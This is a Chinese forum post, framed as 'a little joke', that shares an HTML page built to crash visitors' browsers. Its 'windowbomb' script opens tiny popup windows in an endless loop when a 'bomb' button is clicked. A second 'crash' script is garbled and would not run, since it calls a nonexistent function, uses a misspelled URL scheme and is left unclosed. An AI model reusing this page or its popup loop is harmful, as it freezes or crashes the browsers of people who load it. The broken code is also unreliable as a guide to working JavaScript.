|
阅读:515回复:0
一个小玩笑!
<html>
<head> <script language="javascript"> function windowbomb() { var icounter=0//dummy counter while (true) { window.open("golist.htm","crashing"+icounter,"width=1,height=1,resizable=no") icounter++ } } </script> <title>炸弹</title> </head> <body bgcolor="green"> <fountcolor="red"> <p align="center"><strong>瓜瓜世界</strong></font></p> <form method="post" name="formaction" action="mailto:"+"[email protected]"> <div align="center" ><center><p> 这里有一切美食<br> 吃得快<br> <br> <br> <input type="button" value="炸弹" name="btnexplode windows" onclick="windowbomb()"> <br> <br> <font size="+2">netscapt crash!~</font><br> <script language="javascript"> function crash () { sharky=newdocument(); sharky.url="heep://www.e.net"; </script> <br> <a href="javascript:crash()"> 2hao </a> <br> </p> </center></div> </form></p> </body> </html> -------------------- 有情来下种,因地果还生; 无情亦无种,无性亦无生。 -------“睡教”教主! |
|
|